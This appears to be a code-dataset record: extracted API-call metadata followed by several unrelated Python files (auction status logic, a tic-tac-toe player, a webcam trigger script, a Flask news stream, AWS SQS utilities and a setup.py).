'self_implement_learning_to_adapt.model.forward_fc', 'forward_fc', (['tensor_action_inputs', 'tensor_state_inputs'], {'weights': 'self.new_params[i]', 'reuse': '(True)'}), '(tensor_action_inputs, tensor_state_inputs, weights=self.\n new_params[i], reuse=True)\n', (5532, 5620), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((6221, 6252), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""total_loss"""'], {}), "('total_loss')\n", (6238, 6252), True, 'import tensorflow as tf\n'), ((7198, 7225), 'numpy.zeros', 'np.zeros', (['(state.shape[0],)'], {}), '((state.shape[0],))\n', (7206, 7225), True, 'import numpy as np\n'), ((10765, 10815), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (['"""./graph/"""', 'self.sess.graph'], {}), "('./graph/', self.sess.graph)\n", (10786, 10815), True, 'import tensorflow as tf\n'), ((10873, 10885), 'tensorflow.Summary', 'tf.Summary', ([], {}), '()\n', (10883, 10885), True, 'import tensorflow as tf\n'), ((11017, 11029), 'tensorflow.Summary', 'tf.Summary', ([], {}), '()\n', (11027, 11029), True, 'import tensorflow as tf\n'), ((11167, 11179), 'tensorflow.Summary', 'tf.Summary', ([], {}), '()\n', (11177, 11179), True, 'import tensorflow as tf\n'), ((15464, 15514), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (['"""./graph/"""', 'self.sess.graph'], {}), "('./graph/', self.sess.graph)\n", (15485, 15514), True, 'import tensorflow as tf\n'), ((15968, 15980), 'tensorflow.Summary', 'tf.Summary', ([], {}), '()\n', (15978, 15980), True, 'import tensorflow as tf\n'), ((16112, 16124), 'tensorflow.Summary', 'tf.Summary', ([], {}), '()\n', (16122, 16124), True, 'import tensorflow as tf\n'), ((21877, 21921), 'scipy.signal.lfilter', 'signal.lfilter', (['[1.0]', '[1.0, gamma]', 'x[::-1]'], {}), '([1.0], [1.0, gamma], x[::-1])\n', (21891, 21921), True, 'import scipy.signal as signal\n'), ((6144, 6206), 
'self_implement_learning_to_adapt.model.construct_loss', 'construct_loss', (['self.test_outputs[i]', 'self.test_goal_inputs[i]'], {}), '(self.test_outputs[i], self.test_goal_inputs[i])\n', (6158, 6206), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((6306, 6336), 'tensorflow.stack', 'tf.stack', (['self.total_loss_list'], {}), '(self.total_loss_list)\n', (6314, 6336), True, 'import tensorflow as tf\n'), ((8397, 8416), 'numpy.sum', 'np.sum', (['(action ** 2)'], {}), '(action ** 2)\n', (8403, 8416), True, 'import numpy as np\n'), ((21625, 21649), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (21647, 21649), True, 'import tensorflow as tf\n'), ((21743, 21767), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (21765, 21767), True, 'import tensorflow as tf\n'), ((7767, 7794), 'numpy.sum', 'np.sum', (['(action ** 2)'], {'axis': '(1)'}), '(action ** 2, axis=1)\n', (7773, 7794), True, 'import numpy as np\n'), ((9610, 9650), 'numpy.random.rand', 'np.random.rand', (['num_samples', 'self.a_size'], {}), '(num_samples, self.a_size)\n', (9624, 9650), True, 'import numpy as np\n'), ((11323, 11356), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (11354, 11356), True, 'import tensorflow as tf\n'), ((11399, 11450), 'tensorflow.train.latest_checkpoint', 'tf.train.latest_checkpoint', (['"""./half_cheetah_model/"""'], {}), "('./half_cheetah_model/')\n", (11425, 11450), True, 'import tensorflow as tf\n'), ((11539, 11572), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (11570, 11572), True, 'import tensorflow as tf\n'), ((14351, 14392), 'moviepy.editor.ImageSequenceClip', 'mpy.ImageSequenceClip', (['images'], {'fps': '(20 * 1)'}), '(images, fps=20 * 1)\n', (14372, 14392), True, 'import moviepy.editor as mpy\n'), ((15573, 15606), 
'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (15604, 15606), True, 'import tensorflow as tf\n'), ((15649, 15700), 'tensorflow.train.latest_checkpoint', 'tf.train.latest_checkpoint', (['"""./half_cheetah_model/"""'], {}), "('./half_cheetah_model/')\n", (15675, 15700), True, 'import tensorflow as tf\n'), ((15789, 15822), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (15820, 15822), True, 'import tensorflow as tf\n'), ((10239, 10256), 'numpy.square', 'np.square', (['action'], {}), '(action)\n', (10248, 10256), True, 'import numpy as np\n'), ((14087, 14141), 'PIL.Image.frombytes', 'Image.frombytes', (['"""RGB"""', '(image[1], image[2])', 'image[0]'], {}), "('RGB', (image[1], image[2]), image[0])\n", (14102, 14141), False, 'from PIL import Image\n'), ((14627, 14646), 'numpy.asarray', 'np.asarray', (['rewards'], {}), '(rewards)\n', (14637, 14646), True, 'import numpy as np\n'), ((14967, 14979), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (14977, 14979), True, 'import matplotlib.pyplot as plt\n'), ((15071, 15083), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (15081, 15083), True, 'import matplotlib.pyplot as plt\n'), ((19720, 19732), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (19730, 19732), True, 'import matplotlib.pyplot as plt\n'), ((17331, 17392), 'rllab.misc.ext.extract', 'ext.extract', (['samples[i]', '"""observations"""', '"""actions"""', '"""rewards"""'], {}), "(samples[i], 'observations', 'actions', 'rewards')\n", (17342, 17392), False, 'from rllab.misc import ext\n'), ((17809, 17870), 'rllab.misc.ext.extract', 'ext.extract', (['samples[i]', '"""observations"""', '"""actions"""', '"""rewards"""'], {}), "(samples[i], 'observations', 'actions', 'rewards')\n", (17820, 17870), False, 'from rllab.misc import ext\n'), ((9803, 9822), 'numpy.asarray', 'np.asarray', (['new_obs'], {}), '(new_obs)\n', (9813, 9822), True, 
'import numpy as np\n'), ((9932, 9950), 'numpy.asarray', 'np.asarray', (['action'], {}), '(action)\n', (9942, 9950), True, 'import numpy as np\n'), ((14190, 14209), 'numpy.array', 'np.array', (['pil_image'], {}), '(pil_image)\n', (14198, 14209), True, 'import numpy as np\n'), ((12332, 12347), 'numpy.asarray', 'np.asarray', (['act'], {}), '(act)\n', (12342, 12347), True, 'import numpy as np\n'), ((12436, 12451), 'numpy.asarray', 'np.asarray', (['obs'], {}), '(obs)\n', (12446, 12451), True, 'import numpy as np\n'), ((12532, 12549), 'numpy.asarray', 'np.asarray', (['diffs'], {}), '(diffs)\n', (12542, 12549), True, 'import numpy as np\n'), ((12678, 12693), 'numpy.asarray', 'np.asarray', (['act'], {}), '(act)\n', (12688, 12693), True, 'import numpy as np\n'), ((12782, 12797), 'numpy.asarray', 'np.asarray', (['obs'], {}), '(obs)\n', (12792, 12797), True, 'import numpy as np\n'), ((12878, 12895), 'numpy.asarray', 'np.asarray', (['diffs'], {}), '(diffs)\n', (12888, 12895), True, 'import numpy as np\n'), ((17644, 17665), 'numpy.asarray', 'np.asarray', (['inputs[2]'], {}), '(inputs[2])\n', (17654, 17665), True, 'import numpy as np\n'), ((18131, 18152), 'numpy.asarray', 'np.asarray', (['inputs[2]'], {}), '(inputs[2])\n', (18141, 18152), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
from logging import getLogger
from pkg_resources import get_distribution
from openprocurement.auctions.core.plugins.contracting.base.utils import (
check_auction_status
)
from openprocurement.auctions.core.utils import (
cleanup_bids_for_cancelled_lots, check_complaint_status,
remove_draft_bids,
context_unpack,
get_now,
TZ,
)
# Package distribution metadata; the logger is named after the project
# so log records are attributable to this distribution.
PKG = get_distribution(__package__)
LOGGER = getLogger(PKG.project_name)
def check_bids(request):
    """Resolve the auction's fate once bidding closes.

    Multi-lot auctions: lots with fewer than 2 bids lose their scheduled
    auction start and are switched to 'unsuccessful'; bids tied to
    cancelled lots are cleaned up; if every lot ended up unsuccessful or
    cancelled the whole auction becomes 'unsuccessful'.

    Single-lot auctions with a scheduled auctionPeriod: too few qualified
    bids cancels the start and fails the auction; exactly one bid skips
    the auction phase and goes straight to awarding.

    (Replaces the original's side-effect list comprehensions with plain
    loops — same behavior, idiomatic form.)
    """
    auction = request.validated['auction']
    if auction.lots:
        # First clear scheduled starts, then flip statuses — two passes,
        # preserving the original order of side effects.
        for lot in auction.lots:
            if lot.numberOfBids < 2 and lot.auctionPeriod and lot.auctionPeriod.startDate:
                lot.auctionPeriod.startDate = None
        for lot in auction.lots:
            if lot.numberOfBids < 2 and lot.status == 'active':
                lot.status = 'unsuccessful'
        cleanup_bids_for_cancelled_lots(auction)
        if not {lot.status for lot in auction.lots}.difference({'unsuccessful', 'cancelled'}):
            auction.status = 'unsuccessful'
    else:
        if auction.auctionPeriod:
            if auction.numberOfBids < auction.minNumberOfQualifiedBids:
                auction.auctionPeriod.startDate = None
                auction.status = 'unsuccessful'
            elif auction.numberOfBids == 1:
                # single bidder: no auction round needed, award directly
                auction.auctionPeriod.startDate = None
                request.content_configurator.start_awarding()
def check_status(request):
    """Periodic chronograph hook: advance auction/award/complaint states.

    Updates every complaint and award status against the current time,
    then, depending on lot configuration: switches 'active.tendering' to
    'active.auction' when the tender period ends, or — once all award
    stand-still periods have expired — lets check_auction_status decide
    the final auction state.
    """
    auction = request.validated['auction']
    now = get_now()
    # refresh auction-level complaints, then awards and their complaints
    for complaint in auction.complaints:
        check_complaint_status(request, complaint, now)
    for award in auction.awards:
        request.content_configurator.check_award_status(request, award, now)
        for complaint in award.complaints:
            check_complaint_status(request, complaint, now)
    if not auction.lots and auction.status == 'active.tendering' and auction.tenderPeriod.endDate <= now:
        LOGGER.info('Switched auction {} to {}'.format(auction['id'], 'active.auction'),
                    extra=context_unpack(request, {'MESSAGE_ID': 'switched_auction_active.auction'}))
        auction.status = 'active.auction'
        remove_draft_bids(request)
        check_bids(request)
        return
    elif auction.lots and auction.status == 'active.tendering' and auction.tenderPeriod.endDate <= now:
        LOGGER.info('Switched auction {} to {}'.format(auction['id'], 'active.auction'),
                    extra=context_unpack(request, {'MESSAGE_ID': 'switched_auction_active.auction'}))
        auction.status = 'active.auction'
        remove_draft_bids(request)
        check_bids(request)
        # lots with fewer than 2 bids never get an auction round scheduled
        [setattr(i.auctionPeriod, 'startDate', None) for i in auction.lots if i.numberOfBids < 2 and i.auctionPeriod]
        return
    elif not auction.lots and auction.status == 'active.awarded':
        # single-lot: wait for the LATEST complaint stand-still to expire
        standStillEnds = [
            a.complaintPeriod.endDate.astimezone(TZ)
            for a in auction.awards
            if a.complaintPeriod.endDate
        ]
        if not standStillEnds:
            return
        standStillEnd = max(standStillEnds)
        if standStillEnd <= now:
            check_auction_status(request)
    elif auction.lots and auction.status in ['active.qualification', 'active.awarded']:
        # a pending auction-wide complaint blocks any lot resolution
        if any([i['status'] in auction.block_complaint_status and i.relatedLot is None for i in auction.complaints]):
            return
        for lot in auction.lots:
            if lot['status'] != 'active':
                continue
            lot_awards = [i for i in auction.awards if i.lotID == lot.id]
            standStillEnds = [
                a.complaintPeriod.endDate.astimezone(TZ)
                for a in lot_awards
                if a.complaintPeriod.endDate
            ]
            if not standStillEnds:
                continue
            standStillEnd = max(standStillEnds)
            if standStillEnd <= now:
                check_auction_status(request)
    return
def invalidate_bids_under_threshold(auction):
    """Mark every bid priced below value + minimalStep as invalid (in place)."""
    threshold = round(
        auction['value']['amount'] + auction['minimalStep']['amount'], 2)
    for entry in auction['bids']:
        if entry['value']['amount'] < threshold:
            entry['status'] = 'invalid'
| [
"logging.getLogger",
"openprocurement.auctions.core.utils.context_unpack",
"openprocurement.auctions.core.utils.get_now",
"openprocurement.auctions.core.utils.remove_draft_bids",
"openprocurement.auctions.core.utils.check_complaint_status",
"openprocurement.auctions.core.plugins.contracting.base.utils.che... | [((385, 414), 'pkg_resources.get_distribution', 'get_distribution', (['__package__'], {}), '(__package__)\n', (401, 414), False, 'from pkg_resources import get_distribution\n'), ((424, 451), 'logging.getLogger', 'getLogger', (['PKG.project_name'], {}), '(PKG.project_name)\n', (433, 451), False, 'from logging import getLogger\n'), ((1463, 1472), 'openprocurement.auctions.core.utils.get_now', 'get_now', ([], {}), '()\n', (1470, 1472), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((815, 855), 'openprocurement.auctions.core.utils.cleanup_bids_for_cancelled_lots', 'cleanup_bids_for_cancelled_lots', (['auction'], {}), '(auction)\n', (846, 855), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((1522, 1569), 'openprocurement.auctions.core.utils.check_complaint_status', 'check_complaint_status', (['request', 'complaint', 'now'], {}), '(request, complaint, now)\n', (1544, 1569), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((2130, 2156), 'openprocurement.auctions.core.utils.remove_draft_bids', 'remove_draft_bids', (['request'], {}), '(request)\n', (2147, 2156), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((1735, 1782), 'openprocurement.auctions.core.utils.check_complaint_status', 'check_complaint_status', (['request', 'complaint', 'now'], {}), '(request, complaint, now)\n', (1757, 1782), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, 
get_now, TZ\n'), ((2545, 2571), 'openprocurement.auctions.core.utils.remove_draft_bids', 'remove_draft_bids', (['request'], {}), '(request)\n', (2562, 2571), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((2004, 2078), 'openprocurement.auctions.core.utils.context_unpack', 'context_unpack', (['request', "{'MESSAGE_ID': 'switched_auction_active.auction'}"], {}), "(request, {'MESSAGE_ID': 'switched_auction_active.auction'})\n", (2018, 2078), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((2419, 2493), 'openprocurement.auctions.core.utils.context_unpack', 'context_unpack', (['request', "{'MESSAGE_ID': 'switched_auction_active.auction'}"], {}), "(request, {'MESSAGE_ID': 'switched_auction_active.auction'})\n", (2433, 2493), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((3105, 3134), 'openprocurement.auctions.core.plugins.contracting.base.utils.check_auction_status', 'check_auction_status', (['request'], {}), '(request)\n', (3125, 3134), False, 'from openprocurement.auctions.core.plugins.contracting.base.utils import check_auction_status\n'), ((3878, 3907), 'openprocurement.auctions.core.plugins.contracting.base.utils.check_auction_status', 'check_auction_status', (['request'], {}), '(request)\n', (3898, 3907), False, 'from openprocurement.auctions.core.plugins.contracting.base.utils import check_auction_status\n')] |
import sys
from Training.observer_abilities import *
from Training.cortex_3x3_caddy import *
class Player(Observer):
    """Base tic-tac-toe player identified by a marker code (1 or 10)."""

    def __init__(self, marker_code):
        self.ui = None
        self.marker_code = marker_code

    def get_enemy_code(self):
        """Return the opposing player's marker code (1 <-> 10)."""
        return 1 if self.marker_code == 10 else 10

    def move(self, table_top):
        """Write this player's marker into the chosen cell; return the board."""
        cell = self.choose(table_top)
        table_top.board[cell] = self.marker_code
        return table_top.board

    def choose(self, table_top):
        """Default strategy: take the first legal cell."""
        return self.get_legal_moves(table_top.board)[0]

    def get_legal_moves(self, board):
        """Return the indices of cells holding neither marker."""
        return [idx for idx, cell in enumerate(board)
                if cell != 1 and cell != 10]
class Human(Player):
    """Interactive player driven by console input via the attached UI.

    Tracks consecutive invalid inputs; three strikes flags the table for
    exit and terminates the program.
    """
    name = 'human'
    strikes = 0

    def choose(self, table_top):
        """Ask the human for a cell index; re-prompt on illegal moves."""
        choice = self.get_good_input(table_top)
        if self.check_conscience(choice, table_top.board):
            return self.redo_move(table_top)
        self.reset_strikes()
        return choice

    def get_good_input(self, table_top):
        """Read a 1-based cell number from the UI as a 0-based index.

        Non-numeric input counts as a strike and triggers a re-prompt.
        (The parameter was previously named `board`, but it is the
        table_top object that redo_move expects.)
        """
        try:
            return int(self.ui.ask_human()) - 1
        except ValueError:
            return self.redo_move(table_top)

    def check_conscience(self, choice, board):
        """Return True when the chosen cell is not a legal move."""
        return choice not in self.get_legal_moves(board)

    def redo_move(self, table_top):
        """Record a strike, flag the error on the table, and prompt again."""
        self.add_a_strike(table_top)
        table_top.error = True
        self.ui.refresh()
        return self.choose(table_top)

    def add_a_strike(self, table_top):
        """Count a strike; on the third, flag exit, refresh the UI, and quit."""
        self.strikes += 1
        if self.strikes == 3:
            table_top.exit = True
            self.ui.refresh()
            sys.exit()

    def reset_strikes(self):
        """Clear the strike counter after a valid move."""
        self.strikes = 0
class Computer(Player):
    """Automated player that delegates move selection to a Cortex_3x3 brain."""
    name = 'computer'
    cortex = Cortex_3x3()

    def choose(self, table_top):
        """Pick a move by feeding board intelligence to the cortex."""
        intel = self.get_intelligence(table_top.board)
        return self.cortex.direct_move(intel)

    def get_intelligence(self, board):
        """Bundle board state, legal options, and marker data for the cortex."""
        intelligence = {
            'board': board,
            'options': self.get_legal_moves(board),
            'analysis': self.scan_board(board),
            'marker_code': self.marker_code,
            'enemy_code': self.get_enemy_code(),
        }
        return intelligence
| [
"sys.exit"
] | [((1773, 1783), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1781, 1783), False, 'import sys\n')] |
import cv2
import numpy as np
from numpy.linalg import norm
import requests
def _get_image_frame(camera) -> np.ndarray:
_, frame = camera.read()
return frame
def _convert_frame_to_hsv(frame: np.ndarray) -> np.ndarray:
    """Convert a BGR frame to the HSV color space."""
    hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
    return hsv_frame
def _post_to_michi() -> None:
    """POST to the webhook, retrying until a request completes without raising.

    The previous implementation retried via unbounded recursion, which could
    exhaust the stack on persistent network failures; this loops instead
    (same retry-until-success semantics, no stack growth).
    """
    while True:
        try:
            requests.post("https://tbaum.duckdns.org/api/webhook/awesome-leanix")
            return
        except Exception:
            continue
def main() -> None:
    """Watch the default camera; fire the webhook once brightness exceeds 110."""
    cam = cv2.VideoCapture(0)
    triggered = False
    while not triggered:
        hsv = _convert_frame_to_hsv(_get_image_frame(cam))
        # Mean per-pixel channel magnitude, normalised by sqrt(3).
        brightness = np.average(norm(hsv, axis=2)) / np.sqrt(3)
        if brightness > 110:
            _post_to_michi()
            triggered = True
    print("Success!")
if __name__ == "__main__":
main() | [
"requests.post",
"numpy.sqrt",
"cv2.VideoCapture",
"cv2.cvtColor",
"numpy.linalg.norm"
] | [((239, 277), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2HSV'], {}), '(frame, cv2.COLOR_BGR2HSV)\n', (251, 277), False, 'import cv2\n'), ((477, 496), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (493, 496), False, 'import cv2\n'), ((326, 395), 'requests.post', 'requests.post', (['"""https://tbaum.duckdns.org/api/webhook/awesome-leanix"""'], {}), "('https://tbaum.duckdns.org/api/webhook/awesome-leanix')\n", (339, 395), False, 'import requests\n'), ((650, 660), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (657, 660), True, 'import numpy as np\n'), ((625, 646), 'numpy.linalg.norm', 'norm', (['hsv_img'], {'axis': '(2)'}), '(hsv_img, axis=2)\n', (629, 646), False, 'from numpy.linalg import norm\n')] |
from flask import Flask, render_template, Response
from topicsconsumer import TopicsConsumer
import math
import time
import queue
import threading
import json
# Module-level WSGI application; the route handlers below register on it.
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def searchTopic():
    """Render the landing page with the topic search form."""
    landing_page = render_template('base.html')
    return landing_page
@app.route('/topics', methods=['GET', 'POST'])
def getTopics():
    """Render the topics listing page."""
    topics_page = render_template('topics.html')
    return topics_page
@app.route('/newsandtopics', methods=['GET', 'POST'])
def newsandtopics():
    """Stream news items plus extracted topics as an event-stream response.

    Starts a TopicsConsumer feeding a queue, then yields one delimited
    text block per (news, topics) pair, pausing 10 seconds between items.
    """
    try:
        def inner():
            # Queue is presumably filled by the consumer started below --
            # confirm in TopicsConsumer.startConsumer.
            newsq = queue.Queue()
            cosumerObj = TopicsConsumer(newsq)
            cosumerObj.startConsumer()
            # Give the consumer time to produce its first item.
            time.sleep(10)
            while True:
                # Each queue entry is JSON; get() blocks until one arrives.
                obj = json.loads(newsq.get())
                # content and topics
                content = json.loads(obj[0])
                topics = obj[1]
                yield '***********************START*********************' + '\r\n' +'News : ' + '\r\n' +content['content'] + '\r\n' + '\r\n' +'Topics : ' + '\r\n' +topics +'\r\n'+'***********************END*********************'+ '\r\n'
                time.sleep(10)
        return Response(inner(), mimetype='text/event-stream')
    except Exception as ex:
        # NOTE(review): swallowing the exception makes the view return None;
        # consider logging and returning an explicit error response.
        print(ex)
if __name__ == '__main__':
    # Dev server only: debug=True enables the reloader and interactive debugger.
    app.run(debug=True,port=5050)
| [
"flask.render_template",
"topicsconsumer.TopicsConsumer",
"json.loads",
"flask.Flask",
"time.sleep",
"queue.Queue"
] | [((166, 181), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (171, 181), False, 'from flask import Flask, render_template, Response\n'), ((254, 282), 'flask.render_template', 'render_template', (['"""base.html"""'], {}), "('base.html')\n", (269, 282), False, 'from flask import Flask, render_template, Response\n'), ((359, 389), 'flask.render_template', 'render_template', (['"""topics.html"""'], {}), "('topics.html')\n", (374, 389), False, 'from flask import Flask, render_template, Response\n'), ((516, 529), 'queue.Queue', 'queue.Queue', ([], {}), '()\n', (527, 529), False, 'import queue\n'), ((555, 576), 'topicsconsumer.TopicsConsumer', 'TopicsConsumer', (['newsq'], {}), '(newsq)\n', (569, 576), False, 'from topicsconsumer import TopicsConsumer\n'), ((628, 642), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (638, 642), False, 'import time\n'), ((776, 794), 'json.loads', 'json.loads', (['obj[0]'], {}), '(obj[0])\n', (786, 794), False, 'import json\n'), ((1093, 1107), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (1103, 1107), False, 'import time\n')] |
from datetime import datetime
import boto3
import json
from .stage import Stage
class SQS(object):
    """
    class SQS is a collection of utils related to Foursight queues
    """

    def __init__(self, foursight_prefix):
        self.stage = Stage(foursight_prefix)

    def invoke_check_runner(self, runner_input):
        """
        Simple function to invoke the next check_runner lambda with runner_input
        (dict containing {'sqs_url': <str>})
        """
        client = boto3.client('lambda')
        # InvocationType='Event' makes the invocation asynchronous; async
        # invokes are occasionally problematic, so retry synchronously when
        # the async attempt raises. (Narrowed from a bare `except:`, which
        # also swallowed SystemExit/KeyboardInterrupt.)
        try:
            response = client.invoke(
                FunctionName=self.stage.get_runner_name(),
                InvocationType='Event',
                Payload=json.dumps(runner_input)
            )
        except Exception:
            response = client.invoke(
                FunctionName=self.stage.get_runner_name(),
                Payload=json.dumps(runner_input)
            )
        return response

    def delete_message_and_propogate(self, runner_input, receipt, propogate=True):
        """
        Delete the message with given receipt from sqs queue and invoke the next
        lambda runner.

        Args:
            runner_input (dict): runner info, should minimally have 'sqs_url'
            receipt (str): SQS message receipt
            propogate (bool): if True (default), invoke another check runner lambda

        Returns:
            None
        """
        sqs_url = runner_input.get('sqs_url')
        # Nothing to do without both a queue URL and a message receipt.
        if not sqs_url or not receipt:
            return
        client = boto3.client('sqs')
        client.delete_message(
            QueueUrl=sqs_url,
            ReceiptHandle=receipt
        )
        if propogate is True:
            self.invoke_check_runner(runner_input)

    def recover_message_and_propogate(self, runner_input, receipt, propogate=True):
        """
        Recover the message with given receipt to sqs queue and invoke the next
        lambda runner.

        Changing message VisibilityTimeout to 15 seconds means the message will be
        available to the queue in that much time. This is a slight lag to allow
        dependencies to process.
        NOTE: VisibilityTimeout should be less than WaitTimeSeconds in run_check_runner

        Args:
            runner_input (dict): runner info, should minimally have 'sqs_url'
            receipt (str): SQS message receipt
            propogate (bool): if True (default), invoke another check runner lambda

        Returns:
            None
        """
        sqs_url = runner_input.get('sqs_url')
        if not sqs_url or not receipt:
            return
        client = boto3.client('sqs')
        client.change_message_visibility(
            QueueUrl=sqs_url,
            ReceiptHandle=receipt,
            VisibilityTimeout=15
        )
        if propogate is True:
            self.invoke_check_runner(runner_input)

    def get_sqs_queue(self):
        """
        Returns the boto3 sqs Queue resource for this stage, creating the
        queue if it does not already exist.
        """
        queue_name = self.stage.get_queue_name()
        sqs = boto3.resource('sqs')
        # Narrowed from a bare `except:`; any lookup failure falls back to
        # creating the queue.
        try:
            queue = sqs.get_queue_by_name(QueueName=queue_name)
        except Exception:
            queue = sqs.create_queue(
                QueueName=queue_name,
                Attributes={
                    'VisibilityTimeout': '900',
                    'MessageRetentionPeriod': '3600'
                }
            )
        return queue

    @classmethod
    def send_sqs_messages(cls, queue, environ, check_vals, uuid=None):
        """
        Send messages to SQS queue. Check_vals are entries within a check_group.
        Optionally, provide a uuid that will be queued as the uuid for the run; if
        not provided, datetime.utcnow is used

        Args:
            queue: boto3 sqs resource (from get_sqs_queue)
            environ (str): foursight environment name
            check_vals (list): list of formatted check vals, like those from
                check_utils.CheckHandler().get_check_schedule
            uuid (str): optional string uuid

        Returns:
            str: uuid of queued messages
        """
        # uuid used as the MessageGroupId
        if not uuid:
            uuid = datetime.utcnow().isoformat()
        # prepend environ and uuid as first elements to all check_vals
        proc_vals = [[environ, uuid] + val for val in check_vals]
        for val in proc_vals:
            # send_message's response was previously captured but never used
            queue.send_message(MessageBody=json.dumps(val))
        return uuid

    @classmethod
    def get_sqs_attributes(cls, sqs_url):
        """
        Returns a dict of the desired attributes form the queue with given url
        """
        backup = {
            'ApproximateNumberOfMessages': 'ERROR',
            'ApproximateNumberOfMessagesNotVisible': 'ERROR'
        }
        client = boto3.client('sqs')
        # Narrowed from a bare `except:`; fall back to ERROR placeholders when
        # the queue cannot be queried.
        try:
            result = client.get_queue_attributes(
                QueueUrl=sqs_url,
                AttributeNames=[
                    'ApproximateNumberOfMessages',
                    'ApproximateNumberOfMessagesNotVisible'
                ]
            )
        except Exception:
            return backup
        return result.get('Attributes', backup)
| [
"boto3.resource",
"json.dumps",
"boto3.client",
"datetime.datetime.utcnow"
] | [((489, 511), 'boto3.client', 'boto3.client', (['"""lambda"""'], {}), "('lambda')\n", (501, 511), False, 'import boto3\n'), ((1626, 1645), 'boto3.client', 'boto3.client', (['"""sqs"""'], {}), "('sqs')\n", (1638, 1645), False, 'import boto3\n'), ((2709, 2728), 'boto3.client', 'boto3.client', (['"""sqs"""'], {}), "('sqs')\n", (2721, 2728), False, 'import boto3\n'), ((3112, 3133), 'boto3.resource', 'boto3.resource', (['"""sqs"""'], {}), "('sqs')\n", (3126, 3133), False, 'import boto3\n'), ((4871, 4890), 'boto3.client', 'boto3.client', (['"""sqs"""'], {}), "('sqs')\n", (4883, 4890), False, 'import boto3\n'), ((795, 819), 'json.dumps', 'json.dumps', (['runner_input'], {}), '(runner_input)\n', (805, 819), False, 'import json\n'), ((4262, 4279), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (4277, 4279), False, 'from datetime import datetime\n'), ((4512, 4527), 'json.dumps', 'json.dumps', (['val'], {}), '(val)\n', (4522, 4527), False, 'import json\n'), ((971, 995), 'json.dumps', 'json.dumps', (['runner_input'], {}), '(runner_input)\n', (981, 995), False, 'import json\n')] |
#!/usr/bin/env python
import os
from setuptools import setup
from setuptools.command.install import install
# Long description for PyPI, sourced from the project README.
LONG_DESCRIPTION = ""
_readme_path = os.path.join(os.path.dirname(__file__), 'README.md')
with open(_readme_path, 'r') as readme_file:
    LONG_DESCRIPTION = readme_file.read()

setup(
    name='shadho',
    version='0.4.3.post2',
    description='Hyperparameter optimizer with distributed hardware at heart',
    long_description=LONG_DESCRIPTION,
    long_description_content_type='text/markdown',
    url='https://github.com/jeffkinnison/shadho',
    author='<NAME>',
    author_email='<EMAIL>',
    python_requires='>=3.5',
    packages=[
        'shadho',
        'shadho.installers',
        'shadho.managers',
        'shadho.workers',
    ],
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: MIT License',
        'Topic :: Scientific/Engineering :: Artificial Intelligence',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Operating System :: POSIX',
        'Operating System :: Unix',
    ],
    keywords='machine_learning hyperparameters distributed_computing',
    install_requires=['numpy', 'scipy', 'scikit-learn', 'pyrameter'],
    tests_require=['pytest'],
    include_package_data=True,
)
| [
"os.path.dirname",
"setuptools.setup"
